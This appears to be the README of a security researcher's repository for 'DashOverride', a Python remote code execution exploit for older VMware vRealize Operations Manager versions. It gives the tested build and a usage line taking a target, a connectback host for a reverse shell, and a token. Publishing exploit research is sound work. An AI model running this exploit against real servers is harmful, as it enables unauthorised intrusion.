This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager

Primary language: Python. License: MIT.

DashOverride

What

This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager (vROPS) that impacts versions <= 8.6.3.19682901.

Author

Steven Seeley of Qihoo 360 Vulnerability Research Institute

Tested

The exploit was tested against 8.6.3.19682901 using the file vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00), but it is known to work against other, older versions as well.

Notes

Run

researcher@mars:~$ ./poc.py 
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9

Example

Running DashOverride